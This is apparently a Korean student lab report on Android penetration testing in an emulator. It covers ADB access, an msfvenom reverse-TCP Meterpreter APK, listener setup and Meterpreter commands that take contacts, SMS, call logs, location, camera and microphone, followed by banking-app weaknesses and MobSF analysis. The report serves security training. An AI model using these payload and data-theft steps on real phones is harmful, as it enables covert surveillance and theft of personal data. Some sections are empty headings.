🔍 '' 검색 결과
안드로이드 해킹 분석 보고서

🛡️ 안드로이드 해킹 분석 보고서

Android Hacking & Security Analysis
작성자 박종완 (st67)
날짜 2026년 8월 6일
버전 v1.0

📋 1. 프로젝트 개요

본 보고서는 안드로이드 악성코드 분석 및 모의 해킹 실습을 통해 취약점을 진단하고 대응 방안을 제시합니다. 실제 에뮬레이터 환경에서 Metasploit을 이용한 페이로드 생성 및 데이터 탈취까지 전 과정을 다룹니다.

호스트 PC Windows 10/11 (192.168.0.219)
에뮬레이터 Nox Player v7.0.6.2 (Android 9)
공격자 Kali Linux (NAT, 192.168.0.219)
분석 도구 Metasploit, ADB, MobSF

🔌 2. ADB (Android Debug Bridge) 접근

D:\platform-tools> adb connect 127.0.0.1:62001
D:\platform-tools> adb devices
D:\platform-tools> adb shell

📁 안드로이드 루트 디렉토리 구조

acct       default.prop      init.usb.configfs.rc oem                 root       ueventd.x86.rc
bin           dev               init.usb.rc          plat_file_contexts      sbin       vendor
bugreports    etc               init.x86.rc          plat_hwservice_contexts sdcard     vendor_file_contexts
cache      fstab.x86         init.zygote32.rc     plat_property_contexts sepolicy   vendor_hwservice_contexts
charger    init              init.zygote64_32.rc plat_seapp_contexts    storage    vendor_property_contexts
config     init.environ.rc  lib                 plat_service_contexts  sys        vendor_seapp_contexts
d           init.rc           mnt                 proc                 system     vendor_service_contexts
data       init.superuser.rc odm                 product             ueventd.rc vndservice_contexts
리눅스 (Ubuntu)안드로이드설명
/bin/system/bin기본 바이너리
/etc/system/etc설정 파일
/var/www/html/data/local/tmp웹 루트 / 임시 저장소
/home/sdcard사용자 데이터
/root/ (루트)최상위 디렉토리

🕵️ 3. 악성코드 탐지 및 분석

# 설치된 모든 패키지 목록 출력
shell> pm list packages

# 특정 파일 추출
D:\platform-tools> adb pull /data/local/tmp/1.txt
⚠️ 로그킷(LogKit) 분석
시스템 로그 모니터링, 의심스러운 네트워크 통신 확인, 권한 남용 탐지를 통해 악성 행위를 조기에 발견할 수 있습니다.

💉 4. Metasploit 페이로드 생성 및 리스너

🔨 msfvenom 페이로드 생성

┌──(kali㉿kali)-[~]
└─$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.219 LPORT=4444 -o payload.apk

Payload size: 10244 bytes
Saved as: payload.apk

🎧 리스너(Handler) 설정

┌──(kali㉿kali)-[~]
└─$ msfconsole

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.219
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (72508 bytes) to 192.168.0.219
[*] Meterpreter session 1 opened

📱 5. 데이터 탈취 실습

meterpreter > dump_contacts

[*] Fetching 3 contacts into list
[*] Contacts list saved to: contacts_dump_20260806024545.txt

meterpreter > cat contacts_dump_20260806024545.txt
데이터 유형명령어설명
📇 연락처dump_contacts전화번호부 추출
✉️ SMSdump_sms문자 메시지 탈취
📞 콜 로그dump_calllog통화 기록 추출
📍 위치 정보geolocateGPS 좌표 획득
📷 카메라webcam_snap사진 촬영
🎙️ 마이크record_mic음성 녹음

🏦 6. 뱅킹 앱 취약점 분석

🚨 주요 위협
  1. 안전하지 않은 HTTP 통신 — SSL/TLS 미적용, MITM 공격 위험
  2. 인자 전달값 조작 — 입력값 검증 미흡, SQL 인젝션 위험
  3. 사용자 정보 목록화 이슈 — 개인정보 무단 수집, DB 암호화 미비
  4. 취약한 패스워드 변경 정책 — 약한 비밀번호 허용, 2FA 미구현

🤖 7. MobSF 자동 분석

# Docker를 통한 MobSF 실행
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf

# 웹 인터페이스 접속
http://localhost:8000

🛡️ 8. 보안 대응 방안

🔒 네트워크 보안

💻 코드 보안

🔐 데이터 보안

👤 사용자 인증

🛠️ 9. 권장 도구

🔧 ADB
📱 MobSF
🎣 Frida
🌐 Burp Suite
🔍 Jadx
💉 Metasploit

📊 10. 결론

📌 주요 발견 사항
  1. 안드로이드 에뮬레이터 보안 취약 — ADB 접근 제어 미흡, 루트 권한 손쉽게 획득 가능
  2. Metasploit 공격 성공 — 악성 APK 설치 시 완전한 제어권 탈취, 개인정보 유출 위험
  3. 뱅킹 앱 보안 미흡 — HTTPS 미적용, 중요 데이터 암호화 미비
✅ 권장 사항

📎 부록: 유용한 명령어 모음

# ADB
adb devices                      # 연결된 기기 확인
adb connect 127.0.0.1:62001     # Nox 연결
adb install app.apk             # APK 설치
adb uninstall package.name     # 앱 제거
adb shell pm list packages     # 패키지 목록
adb logcat                    # 로그 확인

# Metasploit
msfvenom -l payloads | grep android  # 안드로이드 페이로드 목록

# 파일 시스템
adb shell ls /data/data/         # 앱 데이터 디렉토리
adb pull /sdcard/Download/file.txt # 파일 추출
adb push file.txt /sdcard/Download/ # 파일 전송